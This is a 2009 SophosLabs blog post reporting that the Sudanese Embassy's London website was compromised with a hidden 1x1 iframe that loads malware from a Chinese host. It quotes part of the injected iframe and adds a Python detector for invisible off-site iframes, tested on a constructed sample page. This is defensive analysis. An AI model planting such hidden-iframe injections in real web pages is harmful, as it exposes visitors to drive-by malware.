YAE: Yet Another Embassy — The Republic of Sudan in London

Monitoring our queues yesterday I thought that I saw a fake Sudanese Embassy website serving malware (Mal/Iframe-F). The press release headings were strange:-
- Who is Blackmailing Whom?
- ICC – Europe’s Guantanamo?
- Sudan and ICC
- National Elections Commission

The suggestion that the International Criminal Court was like Guantanamo was not something I had heard before. So I went to the WHOIS of the site to see who owned the site:
Registrant's address: 60 Chambers Lane London NW10 2RL United Kingdom
NW10 stands for the postcode area North West 10 i.e. Willesden Green. Not where you would traditionally think of Embassies being based in London.
The Contact details were correct though:-
Embassy of the Republic of the Sudan 3 Cleveland Row St. James’s London SW1A 1DD
Curiouser and curiouser. Looking through search engine results on the site it appears that the site is that of the Embassy of Sudan in London!
So why had the site come up in the queues?
Well it contains an iframe with the following code:
.cn/in.cgi?id1000" width=1 height=1 style="visibility: hidden">
This malicious iframe is very small and will download further malware from a Chinese website.
Like other embassies that have been hit, Ethiopia, India etc., the Sudanese haven’t been targeted deliberately but are victims of poor security.
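
A check for the pattern described above (a 1x1 iframe styled invisible that loads from another host), added here as an example and not SophosLabs' detection code. The hostnames and sample page are constructed, and the function and class names are hypothetical.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

def _px(value):
    """Return the leading integer of a width/height attribute, or None."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None

class HiddenIframeFinder(HTMLParser):
    """Collects iframes that are effectively invisible and load off-site content."""
    def __init__(self, site_host, max_px=2):
        super().__init__()
        self.site_host = site_host.lower()
        self.max_px = max_px
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        w, h = _px(a.get("width")), _px(a.get("height"))
        reasons = []
        if (w is not None and w <= self.max_px) or (h is not None and h <= self.max_px):
            reasons.append("tiny")
        style = a.get("style", "").lower().replace(" ", "")
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden-style")
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        offsite = bool(host) and host != self.site_host and not host.endswith("." + self.site_host)
        if reasons and offsite:
            self.findings.append({"src": a["src"], "host": host, "reasons": reasons})

def find_hidden_iframes(html, site_host):
    """Return a list of suspicious iframes found in html served by site_host."""
    finder = HiddenIframeFinder(site_host)
    finder.feed(html)
    return finder.findings

# Constructed sample page: a visible embed, a same-site hidden frame, an injected one.
SAMPLE = """
<iframe src="http://maps.example/embed" width=400 height=300></iframe>
<iframe src="http://www.embassy.example/stats.html" width=1 height=1></iframe>
<iframe src="http://injected.example.invalid/in.cgi?id1000" width=1 height=1 style="visibility: hidden"></iframe>
"""

if __name__ == "__main__":
    for finding in find_hidden_iframes(SAMPLE, "embassy.example"):
        print(finding)
```

Running this over the pages a web server actually serves, rather than the files in its source repository, also catches frames injected at the database or template layer.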
Posted on September 10th, 2009 by Pob, SophosLabs, UK. Filed under: Exploits, General, Malware